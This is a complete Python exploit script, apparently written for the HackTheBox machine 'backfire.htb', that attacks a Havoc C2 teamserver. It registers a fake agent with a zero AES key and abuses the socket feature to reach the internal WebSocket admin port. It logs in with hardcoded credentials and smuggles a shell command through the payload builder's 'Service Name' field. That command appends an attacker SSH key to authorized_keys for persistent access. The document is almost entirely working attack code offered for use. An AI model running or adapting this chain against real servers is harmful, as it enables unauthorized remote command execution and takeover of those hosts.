import os import json import random import string import binascii import requests import urllib3 import subprocess from hashlib import sha3_256 from Crypto.Cipher import AES from Crypto.Util import Counter # Disable SSL warnings (not recommended for production) urllib3.disable_warnings() requests.packages.urllib3.disable_warnings( requests.packages.urllib3.exceptions.InsecureRequestWarning ) # Constants and configurations TEAMSRV_URL = "https://backfire.htb" HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)"} C2_USER = "ilya" C2_PASS_RAW = "CobaltStr1keSuckz!" C2_PASS_HASH = sha3_256(C2_PASS_RAW.encode()).hexdigest() MAGIC_COOKIE = b"\xde\xad\xbe\xef" AES_KEY = b"\x00" * 32 AES_IV = b"\x00" * 16 AGENT_ID = random.randint(100000, 999999).to_bytes(4, "big") HOSTNAME = b"DESKTOP-ASDF123" USERNAME = b"Administrator" DOMAIN_NAME = b"ECORP" INTERNAL_IP = b"127.0.0.1" PROCESS_NAME = "msedge.exe".encode("utf-16le") PROCESS_ID = random.randint(1000, 5000).to_bytes(4, "big") SOCK_ID = b"\x11\x11\x11\x11" SOCK_IP = "127.0.0.1" SOCK_PORT = 40056 SSH_KEYFILE = "key" # Logging functions def log_info(message): print(f"[INFO] {message}") def log_error(message): print(f"[ERROR] {message}") # Padding AES key to ensure it is 32 bytes def pad_key(k: bytes) -> bytes: """Ensures the AES key is exactly 32 bytes.""" return k + b"0" * (32 - len(k)) if len(k) < 32 else k # AES CTR mode encryption def aes_ctr_encrypt(k: bytes, iv: bytes, data: bytes) -> bytes: ctr = Counter.new(128, initial_value=int(binascii.hexlify(iv), 16)) return AES.new(pad_key(k), AES.MODE_CTR, counter=ctr).encrypt(data) # AES CTR mode decryption def aes_ctr_decrypt(k: bytes, iv: bytes, data: bytes) -> bytes: ctr = Counter.new(128, initial_value=int(binascii.hexlify(iv), 16)) return AES.new(pad_key(k), AES.MODE_CTR, counter=ctr).decrypt(data) # Integer to big-endian bytes def i2b(v: int, length: int = 4) -> bytes: """Integer to big-endian bytes.""" return v.to_bytes(length, "big") # Send a POST request def post_data(packet: bytes) -> requests.Response: """Send a POST request to TEAMSRV_URL with the given packet.""" try: r = requests.post(TEAMSRV_URL, data=packet, headers=HEADERS, verify=False) return r except requests.RequestException as e: log_error(f"POST request failed: {e}") class DummyResponse: status_code = 0 content = b"" return DummyResponse() # Generate an SSH key if it doesn't exist, return public key contents def create_ssh_key() -> str: """Generate an SSH key if it doesn't exist, return public key contents.""" if not os.path.exists(SSH_KEYFILE): log_info("Generating SSH key...") cmd = ["ssh-keygen", "-t", "ed25519", "-C", SSH_KEYFILE, "-f", SSH_KEYFILE, "-q", "-N", ""] try: subprocess.run(cmd, check=True) os.chmod(SSH_KEYFILE, 0o600) except (subprocess.CalledProcessError, FileNotFoundError) as e: log_error(f"SSH key generation failed: {e}") return "" pubfile = SSH_KEYFILE + ".pub" if os.path.exists(pubfile): return open(pubfile, "r").read().strip() return "" # Build a masked WebSocket frame for the given message def build_websocket_frame(msg: str) -> bytes: """Build a masked WebSocket frame for the given message.""" payload = msg.encode("utf-8") first_byte = 0x81 # text frame mask_bit = 0x80 length = len(payload) # Encode the payload length if length <= 125: header = bytes([first_byte, mask_bit | length]) elif length <= 65535: header = bytes([first_byte, mask_bit | 126]) + length.to_bytes(2, "big") else: header = bytes([first_byte, mask_bit | 127]) + length.to_bytes(8, "big") # Random mask mask = os.urandom(4) masked_payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload)) return header + mask + masked_payload # Send a packet with optional AES-CTR encryption def send_packet(cmd: bytes, rid: bytes, body: bytes, desc: str, encrypt=True) -> None: """ Construct a packet with optional AES-CTR encryption and send it. Logs success/fail status for the given desc. """ if encrypt: # Encrypt length + body enc = aes_ctr_encrypt(AES_KEY, AES_IV, i2b(len(body) + 4) + body) pkt = i2b(12 + len(enc)) + MAGIC_COOKIE + AGENT_ID + cmd + rid + enc else: pkt = i2b(12 + len(body)) + MAGIC_COOKIE + AGENT_ID + body r = post_data(pkt) if r.status_code == 200: log_info(f"{desc} => OK") elif r.status_code == 404: log_info("You have pawned it!") else: log_error(f"{desc} => FAIL ({r.status_code})") # Register agent def step_register_agent(): log_info("Registering agent...") cmd_id = b"\x00\x00\x00\x63" req_id = b"\x00\x00\x00\x01" extra = b"\xab" * 100 body = ( cmd_id + req_id + AES_KEY + AES_IV + AGENT_ID + i2b(len(HOSTNAME)) + HOSTNAME + i2b(len(USERNAME)) + USERNAME + i2b(len(DOMAIN_NAME)) + DOMAIN_NAME + i2b(len(INTERNAL_IP)) + INTERNAL_IP + i2b(len(PROCESS_NAME) - 6) + PROCESS_NAME + PROCESS_ID + extra ) send_packet(b"", b"", body, "Register Agent", encrypt=False) # Open socket on the teamserver def step_open_socket(): log_info("Opening socket on the teamserver...") cmd = b"\x00\x00\x09\xec" rid = b"\x00\x00\x00\x02" sub = b"\x00\x00\x00\x10" la = b"\x22\x22\x22\x22" lp = b"\x33\x33\x33\x33" rev_ip = b"".join(int(x).to_bytes(1, "big") for x in SOCK_IP.split(".")[::-1]) fwd_port = i2b(SOCK_PORT) body = sub + SOCK_ID + la + lp + rev_ip + fwd_port send_packet(cmd, rid, body, "Open Socket") # Write data to the socket def step_write_socket(data_bytes: bytes, desc: str, subcmd: bytes = b"\x00\x00\x00\x11"): """ Write data to the socket. You can customize subcmd if needed. """ cmd = b"\x00\x00\x09\xec" rid = b"\x00\x00\x00\x08" st = b"\x00\x00\x00\x03" scs = b"\x00\x00\x00\x01" body = subcmd + SOCK_ID + st + scs + i2b(len(data_bytes)) + data_bytes send_packet(cmd, rid, body, desc) # Read data from the socket and decrypt it def step_read_socket() -> bytes: """Read data from the socket, decrypt, and return it.""" log_info("Reading response from socket...") cmd = b"\x00\x00\x00\x01" rid = b"\x00\x00\x00\x09" pkt = i2b(12 + len(cmd + rid)) + MAGIC_COOKIE + AGENT_ID + cmd + rid r = post_data(pkt) if r.status_code != 200: log_error(f"Read from Socket => FAIL ({r.status_code})") return b"" log_info("Read from Socket => OK") dec = aes_ctr_decrypt(AES_KEY, AES_IV, r.content[12:]) return dec[12:] # Main script execution ssh_pub = create_ssh_key() if not ssh_pub: log_error("No SSH public key found or could not be generated.") raise SystemExit step_register_agent() step_open_socket() handshake_req = ( b"GET /havoc/ HTTP/1.1\r\n" b"Host: 127.0.0.1:40056\r\n" b"Upgrade: websocket\r\n" b"Sec-WebSocket-Key: h/TPDav2VwnJVqKeDYxRgQ==\r\n" b"Sec-WebSocket-Version: 13\r\n" b"Connection: Upgrade\r\n\r\n" ) step_write_socket(handshake_req, "WebSocket Handshake") auth_payload = { "Body": {"Info": {"Password": C2_PASS_HASH, "User": C2_USER}, "SubEvent": 3}, "Head": {"Event": 1, "OneTime": "", "Time": "18:40:17", "User": C2_USER}, } step_write_socket(build_websocket_frame(json.dumps(auth_payload)), "Authenticate C2") rnd_listener = "".join( random.choice(string.ascii_lowercase + string.digits) for _ in range(16) ) rnd_port = random.randint(1024, 65535) listener_info = { "Body": { "Info": { "Headers": "", "HostBind": "0.0.0.0", "HostHeader": "", "HostRotation": "round-robin", "Hosts": "0.0.0.0", "Name": rnd_listener, "PortBind": str(rnd_port), "PortConn": str(rnd_port), "Protocol": "Https", "Proxy Enabled": "false", "Secure": "true", "Status": "online", "Uris": "", "UserAgent": "Mozilla/5.0 (Windows NT 6.1; WOW64)", }, "SubEvent": 1, }, "Head": {"Event": 2, "OneTime": "", "Time": "00:00:00", "User": C2_USER}, } step_write_socket(build_websocket_frame(json.dumps(listener_info)), "Create Listener") cmd_injection = ( "mkdir -p /home/ilya/.ssh && " f"echo '{ssh_pub}' >> /home/ilya/.ssh/authorized_keys && " "chmod 700 /home/ilya/.ssh && chmod 600 /home/ilya/.ssh/authorized_keys" "Run script" ) injection_svc = f' \\\\\\" -mbla; {cmd_injection} && false #' final_json = { "Body": { "Info": { "AgentType": "Demon", "Arch": "x64", "Listener": rnd_listener, "Config": ( "{\n" ' "Amsi/Etw Patch": "None",\n' ' "Indirect Syscall": false,\n' ' "Injection": {\n' ' "Alloc": "Native/Syscall",\n' ' "Execute": "Native/Syscall",\n' ' "Spawn32": "C:\\\\Windows\\\\SysWOW64\\\\notepad.exe",\n' ' "Spawn64": "C:\\\\Windows\\\\System32\\\\notepad.exe"\n' " },\n" ' "Jitter": "0",\n' ' "Proxy Loading": "None (LdrLoadDll)",\n' f' "Service Name":"{injection_svc}",\n' ' "Sleep": "2",\n' ' "Sleep Jmp Gadget": "None",\n' ' "Sleep Technique": "WaitForSingleObjectEx",\n' ' "Stack Duplication": false\n' "}" ), "Format": "Windows Service Exe", }, "SubEvent": 2, }, "Head": {"Event": 5, "OneTime": "true", "Time": "18:39:04", "User": C2_USER}, } step_write_socket(build_websocket_frame(json.dumps(final_json)), "Inject SSH Key") resp = step_read_socket() if resp: log_info("[Teamserver Final Response]\n" + resp.decode("utf-8", errors="ignore")) print("\033[1;32m\n~~~~~Exploit complete!~~~~~\033[0m") print("You can now SSH into the target via:") print(f"\033[1;93mssh -i {SSH_KEYFILE} ilya@backfire.htb\033[0m") print("\033[1;31m\n~~~~~Pawned!~~~~~\033[0m") else: log_error("[Teamserver Final Response]\n" + (resp.decode("utf-8", errors="ignore") if resp else "No response"))